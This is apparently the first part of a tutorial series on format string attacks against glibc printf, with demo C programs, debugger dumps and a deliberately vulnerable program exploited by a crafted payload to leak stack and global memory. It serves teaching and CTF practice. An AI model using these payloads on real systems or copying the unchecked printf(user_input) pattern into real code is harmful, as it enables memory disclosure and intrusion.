The Rocky Road To Pwn - Part One
Format Print Basic and Elementary Format Print Attack
- Part One: Format Print Basic and Elementary Format Print Attack
- Part Two: Relocation(ASLR) and Data Manipulation With Format Print
- Part Three: A real CTF challenge
Welcome to the first part of the Pwn trilogy. Our journey begins with exploring the glibc implementation of the format print function printf
from the C standard library. This will pave the way for direct and indirect memory reading, which is instrumental for information leaking. In the upcoming parts of this trilogy, we will delve deeper into the format print function, demonstrate how to manipulate data with format printing and explain how it facilitates remote code execution (RCE). Additionally, we will discuss a system-level countermeasure to binary exploitation (Pwn) and how to bypass it. Finally, we will demonstrate the application of these skills in a real CTF challenge.
Format print basic
In C programming, the format print function is a crucial tool for output operations, enabling developers to present information to users in a structured and readable format. Its versatility allows for printing various data types, making it an indispensable asset for debugging, user interaction, and data presentation in software development. However, this power retains pricy vulnerabilities, particularly in format string attacks. These vulnerabilities, if not understood and addressed, can be exploited to compromise the security of the software.
To understand how the format string attack works, we can start by looking at the position-parameterized placeholder arguments, which are in the form of %m$p
, where m
represents the position parameter of the placeholder and p
represents the actual conversion specifier. To further explore the relationship between placeholders and the arguments of the format print function, let’s consider an example: printf("%d %c %x", 1, 121, 65);
.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
int main() {
printf("%d %c %x\n",1,121,65);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc && ./poc
1 y 41
In the example mentioned, the print function displays 1 y 41
using the format string %d %c %x
. Here, %d
corresponds to the first argument after the format string, 1
. %c
is for the second argument, which has the 121
—the ASCII code for the letter y
. %x
refers to the third argument with the value 65
, which is 0x41
in hexadecimal.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
int main() {
printf("%2$d %3$c %1$x\n",1,121,65);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc && ./poc
121 A 1
[skid.t@BlackArch workspace]$
Let’s update the format string using positional parameters. Now, the %2$d
in the format string corresponds to the second argument after the format string, with a value of 121
. The %3$c
corresponds to the third argument with a value of 65
, the ASCII code for A
; the same goes for the last one.
Even though the program’s output aligns with the position parameters of each placeholder in the format string, we still need to determine how the format print function handles the position-parameterized placeholders. There are two hypotheses: it either rearranges the arguments during compile time or reads them out of order during runtime. To reveal the secret, we can run the program with a debugger and set a breakpoint before the format print function is called. The debugger helps us gain a lower-system view of how things work.
Breakpoint 1, 0x000055555555515b in main () at poc.c:3
3 printf("%2$d %3$c %1$x\n",1,121,65);
(gdb) p /s (char *) $rdi
$1 = 0x555555556004 "%2$d %3$c %1$x\n"
(gdb) p $rsi
$2 = 1
(gdb) p $rdx
$3 = 121
(gdb) p $rcx
$4 = 65
We run and debug the program on a Linux-based x86_64 system. In the debugging session, we notice that the RDI
register contains the pointer to the format string, the RSI
register contains the first argument after the format string, the RDX
register contains the second argument, and the RCX
register contains the third argument. This adheres to the Linux x86_64 userspace function calling convention. As a result, the format print function resolves out-of-order placeholders during runtime since the arguments are not rearranged.
We also dereference the format string pointer in the debugger because the value of RDI
is just a pointer, and the address referred to by the pointer is the actual beginning of the format string. Consider the s
conversion specifier from the format print function manual. If we arrange a placeholder with the s
conversion specifier targeting the RDI
register, the format print function will print the format string itself. For a program under a debugger, we could simply alter the value in the RSI
register, making it identical to the RDI
register. This way, we could use a simple format string with %s
as its first placeholder to print the format string itself. We won’t provide an example here but will discuss more in the indirect reading section of the format print attack.
Format print attack
The format print attack(aka. format string attack) is a classical memory corruption attack without typical out-of-bounds buffer overflowing. It comes with the variadic function design of the format print function printf
in the C standard library. The format print function takes its first argument as a format string containing placeholders and replaces them with the actual values during runtime. Thanks to the out-of-order placeholder resolution and built-in debug functionalities, user-controllable format strings provide an exploitable vulnerability for arbitrary memory dump or corruption.
The format print function always requires a format string as its first argument. Controlling the format string by a legitimate user or a malicious attacker can lead to a format print attack. We have categorized format print attack techniques into three categories: direct memory reading, indirect memory reading, and indirect memory writing. These categories are based on the behaviour of the format print function. Direct memory reading can read at most eight octlets in existing stack frames, while indirect memory reading and writing theoretically enable access to arbitrary addresses. At the end of the last section, we utilize the s
conversion specifier to echo the format string. The indirect memory reading takes a similar idea. But before we dive into the indirect memory reading, let’s start with the direct memory reading.
Direct memory reading
Direct memory reading is a technique that allows an external entity to exploit the format print function. If the external entity controls the format string provided to the format print function, it can provide a format string that contains too many or incorrectly positioned placeholders. In this case, the function attempts to convert the values in the corresponding memory location to a printable value, replacing the placeholder.
Most operating systems and architectures allow arguments to be passed on the stack using the procedure calling convention. Therefore, an external entity could create a specific format string that manipulates the format print function. The function would interpret an address on the stack as an argument associated with a placeholder in the format string. This would result in the function trying to convert the values in the corresponding memory location to a printable value, replacing the placeholder.
Since procedure call parameters on the stack can only appear on the caller’s stack frame, direct memory reading can only be applied to addresses above the current stack pointer. Additionally, direct memory reading usually extends beyond the current stack frame, covering most existing stack frames. The following example provides a demonstration of direct memory reading.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
int main() {
const char flag[] = "my secret flag";
printf("%6$016llX %7$016llX %8$016llX %9$016llX %10$016llX %11$016llX\n");
}
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc
[skid.t@BlackArch workspace]$ ./poc
0000000000000000 7263657320796D40 0067616C66207465 3351B3EA0668A900 0000000000000001 00007FFFF7DB7CD0
In this example, the program creates a stack variable called flag
and sets its value to my secret flag
. It then uses the format print function with a long format string containing placeholders but no corresponding arguments. When the program is executed, it prints six hexadecimal numbers, each corresponding to a placeholder in the format string.
For example, let’s take 0000000000000000
, which corresponds to the placeholder %6$016llX
. Here, 6
indicates that this placeholder takes the value of the sixth argument after the format string from the format print function. 016
is the field width specifier, indicating that the resulting hexadecimal number contains 16 characters with leading zeros. Lastly, llX
specifies that the argument is a long long integer presented in hexadecimal. On a Linux-based x86_64 system, long long integers are 64 bits long.
Recall the Linux x86_64 userspace function calling convention; the RDI
register is for the first argument in a function call. In the case of the format print function, it’s always a pointer to the format string. The first six arguments are passed by registers, and then arguments are passed on the stack. Given that the sixth argument after the format string is the seventh argument in a format print function call, %6$016llX
decodes the first stack argument and displays it as a hexadecimal number.
According to the calling convention, the first stack argument is the 8-byte value pointed to by the stack pointer before the function call. It’s also the adjacent 8-byte value to the return address of the callee function’s stack frame. Therefore, the long format string prints six subsequent 8-byte values from the caller function’s stack frame in ascending order. We can verify this by examining the stack frame in the debugger.
Breakpoint 1, 0x000055555555518b in main () at poc.c:5
5 printf("%6$016llX %7$016llX %8$016llX %9$016llX %10$016llX %11$016llX\n");
(gdb) x/6gx $rsp
0x7fffffffe2d0: 0x0000000000000000 0x7263657320796d40
0x7fffffffe2e0: 0x0067616c66207465 0x3351b3ea0668a900
0x7fffffffe2f0: 0x0000000000000001 0x00007ffff7db7cd0
(gdb)
When using the Gnu debugger (GDB), we can use a similar format specifier to the memory dump command. This command displays the six consecutive octlets from the stack pointer (RSP) in hexadecimal format. The content shown by the debugger is the same as the values from the format print function.
We must consider endianness to further decode the hexadecimal number into byte sequences. On x86_64 machines, integers are stored in little-endian. Therefore, to reveal the 8-byte sequence represented by 0x7263657320796d40
, we split the integer into bytes and reverse it: 0x40 0x6d 0x79 0x20 0x73 0x65 0x63 0x72
. With the debugger, we don’t need to do this manually, as there’s another format specifier for the memory dump command that displays the memory chunk byte-by-byte.
(gdb) x/48bx $rsp
0x7fffffffe2d0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe2d8: 0x40 0x6d 0x79 0x20 0x73 0x65 0x63 0x72
0x7fffffffe2e0: 0x65 0x74 0x20 0x66 0x6c 0x61 0x67 0x00
0x7fffffffe2e8: 0x00 0xa9 0x68 0x06 0xea 0xb3 0x51 0x33
0x7fffffffe2f0: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe2f8: 0xd0 0x7c 0xdb 0xf7 0xff 0x7f 0x00 0x00
Remember that the flag
variable is located on the stack, specifically within the stack frame of the main
function. Consequently, the program may have inadvertently exposed the flag through the format print function. Given this, it’s crucial to analyze the stack dump for the flag.
Stack dump interpretation
The example program dumped a memory chunk from its runtime stack. We must analyze the memory dump to check if it contains the flag string. To understand the structure of the stack frame, we can use static analysis by disassembling the main
function to gain more insights.
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555149 <+0>: push %rbp
0x000055555555514a <+1>: mov %rsp,%rbp
0x000055555555514d <+4>: sub $0x20,%rsp
0x0000555555555151 <+8>: mov %fs:0x28,%rax
0x000055555555515a <+17>: mov %rax,-0x8(%rbp)
0x000055555555515e <+21>: xor %eax,%eax
0x0000555555555160 <+23>: movabs $0x657263657320796d,%rax
0x000055555555516a <+33>: mov %rax,-0x17(%rbp)
0x000055555555516e <+37>: movabs $0x67616c66207465,%rax
0x0000555555555178 <+47>: mov %rax,-0x10(%rbp)
0x000055555555517c <+51>: lea 0xe85(%rip),%rax # 0x555555556008
0x0000555555555183 <+58>: mov %rax,%rdi
0x0000555555555186 <+61>: mov $0x0,%eax
=> 0x000055555555518b <+66>: call 0x555555555040 <printf@plt>
0x0000555555555190 <+71>: mov $0x0,%eax
0x0000555555555195 <+76>: mov -0x8(%rbp),%rdx
0x0000555555555199 <+80>: sub %fs:0x28,%rdx
0x00005555555551a2 <+89>: je 0x5555555551a9 <main+96>
0x00005555555551a4 <+91>: call 0x555555555030 <__stack_chk_fail@plt>
0x00005555555551a9 <+96>: leave
0x00005555555551aa <+97>: ret
End of assembler dump.
The disassembled main
function reveals that stack variables use the base pointer (RBP) relative addressing. This is common on x86_64 machines because the base pointer (RBP) is more stable than the stack pointer (RSP) during a procedure call. We will delve into this in more detail later. The disassembled instructions indicate that the flag text is stored on the stack at RBP-23 (0x17)
, occupying a 15-byte space. Following that is the stack canary at RBP-8
, which occupies 8 bytes. Then, the saved base pointer value from the previous stack frame, an octlet, follows the stack canary. Finally, the 8-byte return address is at the bottom of the current stack frame.
In the debugging session, it was discovered that the stack pointer (RSP) is located at 0x7ffffffe2d0
. With this information, we can reconstruct the structure of the stack frame.
Stack Pointer(RSP): ┌───────────────────────┐
0x7fffffffe2d0 │ unused │
│ ┌────────────────────┤
0x7fffffffe2d8 │ │ flag │
├──┴────────────────────┤
0x7fffffffe2e0 │ flag (cont.) │
├───────────────────────┤
0x7fffffffe2e8 │ stack canary │
Base Pointer(RSP): ├───────────────────────┤
0x7fffffffe2f0 │ saved RBP │
├───────────────────────┤
0x7fffffffe2f8 │ return address │
└───────────────────────┘
The stack pointer (RSP) is 32 bytes (0x20 in hexadecimal) from the base pointer (RBP). The flag
variable is located at 0x7fffffffe2d9
. Following that, the stack canary is at 0x7fffffffe2e8
, the value of the saved RBP pointed to by the base pointer is at 0x7fffffffe2f0
, and the return address is at 0x7fffffffe2f8
.
We have the addresses and offsets of each variable. With the stack dump, we can easily reconstruct the flag string my secret flag
from the leaked byte sequence: 0x6d 0x79 0x20 0x73 0x65 0x63 0x72 0x65 0x74 0x20 0x66 0x6c 0x61 0x67 0x00
. These values come from the second and third hexadecimal numbers printed by the program.
In real-world scenarios, the flag string may contain sensitive data, such as user credentials, that should not be displayed. Furthermore, a malicious actor may provide a format string instead of a hardcoded one. The provided format string typically contains too many or incorrectly positioned placeholders, which can result in data leakage. As the format print function reads the corresponding data and directly prints it without pointer dereferences, the attack technique goes by direct memory reading.
Exploring direct memory reading is a valuable path to delve into binary exploration. In this section, we extracted a secret flag from the victim process’s stack frame. As mentioned, the direct memory reading technique only works for addresses higher than the current stack pointer (RSP). To go beyond this, we must introduce the indirect memory reading technique. Additionally, it’s important to practice reading disassembled functions and reconstructing data structures from memory dumps.
Indirect memory reading
Indirect memory reading enhances memory dumping by targeting arbitrary addresses. Unlike direct memory reading, which reads the value on the stack and prints it directly, indirect memory reading fetches the value on the stack, dereferences it as if it is a pointer, and prints out data at the designated address.
In a previous example, we modified the RSI
register using a debugger and printed the format string. The concept of indirect memory reading is similar but involves using values on the stack instead of modifying register values. In this case, the RSI
register is linked to a placeholder with the s
conversion specifier. The s
conversion specifier treats the associated argument as a string pointer, dereferences it, and prints both printable and non-printable bytes until a null byte is encountered. Once again, we’ll use the following example to better understand the s
conversion specifier at a lower-system level.
[skid.t@BlackArch workspace]$ cat poc.c
#include <stdio.h>
const char motto[] = "binary exploitation is sick!";
int main() {
printf("%s\n",motto);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g -fno-builtin poc.c -o poc
[skid.t@BlackArch workspace]$ ./poc
binary exploitation is sick!
In this example, the string “motto” is stored as a global static constant outside the runtime call stack. When the printf
function attempts to print the content of the “motto” string, it needs to access the provided pointer that contains the string’s address. Additionally, the source code is compiled with GCC built-in functions disabled. This means that built-in function optimizations will not replace printf
with puts
even if dynamic formatting at runtime is unnecessary. As with previous cases, it is essential to disassemble the main
function with objdump
to view its underlying details at a lower level.
[skid.t@BlackArch workspace]$ objdump --disassemble=main ./poc
./poc: file format elf64-x86-64
Disassembly of section .init:
Disassembly of section .plt:
Disassembly of section .text:
0000000000001139 <main>:
1139: 55 push %rbp
113a: 48 89 e5 mov %rsp,%rbp
113d: 48 8d 05 cc 0e 00 00 lea 0xecc(%rip),%rax # 2010 <motto>
1144: 48 89 c6 mov %rax,%rsi
1147: 48 8d 05 df 0e 00 00 lea 0xedf(%rip),%rax # 202d <motto+0x1d>
114e: 48 89 c7 mov %rax,%rdi
1151: b8 00 00 00 00 mov $0x0,%eax
1156: e8 d5 fe ff ff call 1030 <printf@plt>
115b: b8 00 00 00 00 mov $0x0,%eax
1160: 5d pop %rbp
1161: c3 ret
Disassembly of section .fini:
[skid.t@BlackArch workspace]$ xxd -seek 8208 -l 48 poc
00002010: 6269 6e61 7279 2065 7870 6c6f 6974 6174 binary exploitat
00002020: 696f 6e20 6973 2073 6963 6b21 0025 730a ion is sick!.%s.
00002030: 0000 0000 011b 033b 2000 0000 0300 0000 .......; .......
The main
function has a short paragraph of instructions that the disassembler created. These instructions load the addresses of the “motto” string and the format string into parameter correspondent registers before calling the printf
procedure. The addresses of both strings are not hardcoded as specific values, but instead, they are an offset towards the instruction pointer register (RIP). This happens because the compiler uses position-independent code (PIC), which enables program segments to be relocated into arbitrary memory chunks instead of a predefined specific address, as requested by the address space layout randomization (ASLR). ASLR is a countermeasure against adversaries who aim to gain control over the program flow.
Although the disassembler has already commented on the designated position of the corresponding addresses of the strings, it’s still interesting to understand how those numbers come out. If you add 0xecc
directly to the address of the lea
instruction 0x113d
, you may encounter a weird number 0x2009
, 7 bytes ahead of the assembler-suggested address. This happens because the address arithmetic occurs after the fetch stage of the CPU instruction cycle. Therefore, the correct RIP value for the arithmetic is the address of the next instruction, 0x1144
, which leads to the correct address, 0x2010
or 8208
in decimal. Scrutinizing the binary with the corresponding offset in hexadecimal format or attaching a debugger to inspect the actual layout of a loaded executable in the real system can help verify the address.
Breakpoint 1, 0x0000555555555156 in main () at poc.c:6
6 printf("%s\n",motto);
(gdb) disassemble
Dump of assembler code for function main:
0x0000555555555139 <+0>: push %rbp
0x000055555555513a <+1>: mov %rsp,%rbp
0x000055555555513d <+4>: lea 0xecc(%rip),%rax # 0x555555556010 <motto>
0x0000555555555144 <+11>: mov %rax,%rsi
0x0000555555555147 <+14>: lea 0xedf(%rip),%rax # 0x55555555602d
0x000055555555514e <+21>: mov %rax,%rdi
0x0000555555555151 <+24>: mov $0x0,%eax
=> 0x0000555555555156 <+29>: call 0x555555555030 <printf@plt>
0x000055555555515b <+34>: mov $0x0,%eax
0x0000555555555160 <+39>: pop %rbp
0x0000555555555161 <+40>: ret
End of assembler dump.
(gdb) p $rip
$1 = (void (*)()) 0x555555555156 <main+29>
(gdb) p/x $rdi
$2 = 0x55555555602d
(gdb) p/x $rsi
$3 = 0x555555556010
(gdb) p/x main + 11 + 0xecc
$4 = 0x555555556010
(gdb) p/x main + 21 + 0xedf
$5 = 0x55555555602d
(gdb) p/x $rdi - $rsi
$6 = 0x1d
(gdb) x/48bx motto
0x555555556010 <motto>: 0x62 0x69 0x6e 0x61 0x72 0x79 0x20 0x65
0x555555556018 <motto+8>: 0x78 0x70 0x6c 0x6f 0x69 0x74 0x61 0x74
0x555555556020 <motto+16>: 0x69 0x6f 0x6e 0x20 0x69 0x73 0x20 0x73
0x555555556028 <motto+24>: 0x69 0x63 0x6b 0x21 0x00 0x25 0x73 0x0a
0x555555556030: 0x00 0x00 0x00 0x00 0x01 0x1b 0x03 0x3b
0x555555556038: 0x20 0x00 0x00 0x00 0x03 0x00 0x00 0x00
(gdb) p/s motto
$7 = "binary exploitation is sick!"
(gdb) p/s motto+0x1d
$8 = 0x55555555602d "%s\n"
The program runs on a Linux-based x86_64 system with ASLR enabled. ASLR randomizes the memory location of the program’s sections, including the main
function and the lea
instructions. After relocation, the main
function is moved to 0x555555555139
, and the two lea
instructions are relocated to 0x55555555513d
and 0x555555555147
, respectively. Despite the randomization, the relative offsets between the instructions, the motto
, and the format strings remain consistent. We confirmed this consistency using the debugger’s built-in arithmetic system.
The s
conversion specifier in printf
treats the specified argument as a pointer to a character string (char *
). It dereferences the pointer and then replaces the corresponding placeholder with the binary content of the character string. The binary content of the character string consists of printable and non-printable bytes until a null byte is encountered. Although limiting the number of bytes to print in the resulting string is possible, there’s no straightforward way to encode the byte stream into decimal or hexadecimal format. The concept of indirect memory reading combines the s
conversion specifier and position parameters to read data from an arbitrary address.
Understanding how the %s
placeholder works at a lower level makes it easier to comprehend position-parameterized placeholders. Position parameterized placeholders in externally controlled format strings are crucial for indirect memory reading. To better understand this concept, consider the following C example: it sets up a scenario where the program prints the address of a global static constant named secret_motto
, reads an externally controlled format string from the standard input, and processes it. This example is a valuable practice for the techniques we have just learned.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <alloca.h>
#define BUFSIZE 32
const char secret_motto[] = "you are sick!";
int main() {
printf("Hackme at: %p\n",&secret_motto);
char *input_buf = alloca(BUFSIZE);
memset(input_buf,0,BUFSIZE);
if(!fgets(input_buf,BUFSIZE,stdin)) {
puts("I feel sick, Bye.");
exit(EXIT_FAILURE);
}
printf(input_buf);
return EXIT_SUCCESS;
}
Unlike previous examples, the program prints the address of the motto instead of loading it onto the stack frame. Also, because the first printf
is far from the second printf
and there are multiple procedure calls in between, the preservation of arguments passed by registers is not guaranteed. However, the user input buffer resides on the call stack, allowing us to inject the motto’s address into the stack at runtime. This makes it possible to perform an indirect memory reading with a position-parameterized placeholder. We can begin by disassembling the main
function and reconstructing the stack frame.
[skid.t@BlackArch workspace]$ gcc -O0 -g poc.c -o poc
[skid.t@BlackArch workspace]$ objdump --disassemble=main ./poc
./poc: file format elf64-x86-64
Disassembly of section .init:
Disassembly of section .plt:
Disassembly of section .text:
0000000000001189 <main>:
1189: 55 push %rbp
118a: 48 89 e5 mov %rsp,%rbp
118d: 48 83 ec 10 sub $0x10,%rsp
1191: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
1198: 00 00
119a: 48 89 45 f8 mov %rax,-0x8(%rbp)
119e: 31 c0 xor %eax,%eax
11a0: 48 8d 05 61 0e 00 00 lea 0xe61(%rip),%rax # 2008 <secret_motto>
11a7: 48 89 c6 mov %rax,%rsi
11aa: 48 8d 05 65 0e 00 00 lea 0xe65(%rip),%rax # 2016 <secret_motto+0xe>
11b1: 48 89 c7 mov %rax,%rdi
11b4: b8 00 00 00 00 mov $0x0,%eax
11b9: e8 92 fe ff ff call 1050 <printf@plt>
11be: b8 10 00 00 00 mov $0x10,%eax
11c3: 48 83 e8 01 sub $0x1,%rax
11c7: 48 83 c0 28 add $0x28,%rax
11cb: b9 10 00 00 00 mov $0x10,%ecx
11d0: ba 00 00 00 00 mov $0x0,%edx
11d5: 48 f7 f1 div %rcx
11d8: 48 6b c0 10 imul $0x10,%rax,%rax
11dc: 48 29 c4 sub %rax,%rsp
11df: 48 89 e0 mov %rsp,%rax
11e2: 48 83 c0 0f add $0xf,%rax
11e6: 48 c1 e8 04 shr $0x4,%rax
11ea: 48 c1 e0 04 shl $0x4,%rax
11ee: 48 89 45 f0 mov %rax,-0x10(%rbp)
11f2: 48 8b 45 f0 mov -0x10(%rbp),%rax
11f6: ba 20 00 00 00 mov $0x20,%edx
11fb: be 00 00 00 00 mov $0x0,%esi
1200: 48 89 c7 mov %rax,%rdi
1203: e8 58 fe ff ff call 1060 <memset@plt>
1208: 48 8b 15 31 2e 00 00 mov 0x2e31(%rip),%rdx # 4040 <stdin@GLIBC_2.2.5>
120f: 48 8b 45 f0 mov -0x10(%rbp),%rax
1213: be 20 00 00 00 mov $0x20,%esi
1218: 48 89 c7 mov %rax,%rdi
121b: e8 50 fe ff ff call 1070 <fgets@plt>
1220: 48 85 c0 test %rax,%rax
1223: 75 19 jne 123e <main+0xb5>
1225: 48 8d 05 f9 0d 00 00 lea 0xdf9(%rip),%rax # 2025 <secret_motto+0x1d>
122c: 48 89 c7 mov %rax,%rdi
122f: e8 fc fd ff ff call 1030 <puts@plt>
1234: bf 01 00 00 00 mov $0x1,%edi
1239: e8 42 fe ff ff call 1080 <exit@plt>
123e: 48 8b 45 f0 mov -0x10(%rbp),%rax
1242: 48 89 c7 mov %rax,%rdi
1245: b8 00 00 00 00 mov $0x0,%eax
124a: e8 01 fe ff ff call 1050 <printf@plt>
124f: b8 00 00 00 00 mov $0x0,%eax
1254: 48 8b 55 f8 mov -0x8(%rbp),%rdx
1258: 64 48 2b 14 25 28 00 sub %fs:0x28,%rdx
125f: 00 00
1261: 74 05 je 1268 <main+0xdf>
1263: e8 d8 fd ff ff call 1040 <__stack_chk_fail@plt>
1268: c9 leave
1269: c3 ret
Disassembly of section .fini:
The main
function in assembly is more complex than in previous examples, but we can defer most details for analysis purposes. The user input buffer is located on the stack and is directly pointed to by the stack pointer RSP
. One notable aspect of the disassembly is the significant increase in the stack frame, which is indicated by the considerable decrement of the stack pointer RSP
in the middle of the function. This happens because alloca
allocates the buffer for user input within the current stack frame, while malloc
allocates memory from the heap. The delayed allocation of the input buffer helps to align the start of the buffer with the stack pointer RSP
.
The user input buffer begins at the stack pointer RSP
, and the program reveals the address of the motto. This makes it easier to create a format string payload that prints the secret motto. Since the program uses fgets
to read user input, we can inject raw bytes into the buffer without worrying about null and escape characters. To exploit this, a simple approach for the format string is to encode the motto’s address into a little-endian octlet and append it with the suffix %6$s
. Theoretically, the format print function should display the little-endian octlet in raw binary and then print the motto. The suffix %6$s
instructs the format print function to dereference the first octlet on the stack and print the string at that address. However, we don’t live in a perfect world.
The fgets
function does not distinguish null bytes and places all input content into the stack buffer. However, the format print function only processes part of the format string. Precisely, it only echoes the first six bytes of the little-endian octlet. After carefully reading the manual of the format print function, we found it reasonable, as the function treats the format string as a null-terminating string. Therefore, the format print function only processes the portion of the format until the first null byte is present. Based on this, we must adjust the format string payload so that the placeholder suffix goes before the little-endian octlet.
We switched the position of the placeholder suffix and the little-endian octlet to prevent truncation. Remember that the positional parameter in a placeholder specifies the procedure call argument for the format print function. The x86_64 calling convention requires all stack arguments to be octlets. Therefore, the little-endian octlet must be aligned to the stack pointer (RSP) by eight. We must pad the placeholder with arbitrary non-null characters to meet the alignment requirement. We choose to use the space character for padding. Additionally, we need to update the position parameter from 6
to 7
in the format placeholder, as the little-endian octlet is now one octlet away from the stack pointer (RSP). In the end, we have %7$s
followed by the raw bytes of the address of the motto string.
One crucial detail remains: the format string payload depends on the randomly generated address of the motto, which occurs and leeks during runtime. As a result, we cannot prepare the payload in advance. Since the payload contains non-printable bytes, we cannot simply enter it like a regular command line program. To address this issue, we used a bash trick. We redirected the standard input from the current console to a named pipe called payload
, then input the assembled format string payload into the named pipe file. Additionally, we utilized the bash built-in command printf
to construct the payload, and we had to include an extra escape sequence %
to prevent interpretation errors.
[skid.t@BlackArch workspace]$ mkfifo payload
[skid.t@BlackArch workspace]$ tail -f payload | ./poc & sleep 1
[1] 116974
Hackme at: 0x5bd2489bb008
[skid.t@BlackArch workspace]$ printf '%%7$s \x08\xb0\x9b\x48\xd2\x5b\x00\x00\n' | xxd
00000000: 2537 2473 2020 2020 08b0 9b48 d25b 0000 %7$s ...H.[..
00000010: 0a .
[skid.t@BlackArch workspace]$ printf '%%7$s \x08\xb0\x9b\x48\xd2\x5b\x00\x00\n' > payload ; sleep 1
you are sick! H�[1]+ Done tail -f payload | ./poc
Here, we have a program that prints a motto. In this example, we have exploited a vulnerable program to reveal a global static string that should have been kept secret. The exploitation involves using the indirect memory reading technique and some bash tricks. The indirect memory reading technique does not require attaching a debugger to the vulnerable program or altering its register value. Instead, it loads the target address on the stack and associates it with the s
conversion specifier using a positional parameter. The indirect memory reading approach offers a valuable opportunity to access specific memory areas within a computer system.
This is the part one of the Pwn trilogy. Here, we cover the basics of the format print function, from an overview to a lower-level system aspect. We also discuss the format string attack, focusing on two detailed approaches: direct and indirect memory reading, both on how to leak information. Part two will explore how to alter existing data and take over the victim program’s control flow, leading to remote code execution (RCE). Additionally, we will examine countermeasures against modern binary exploitation and how to bypass them. Finally, part three will involve practically applying all the techniques in an actual Capture The Flag (CTF) challenge. We hope you enjoy them.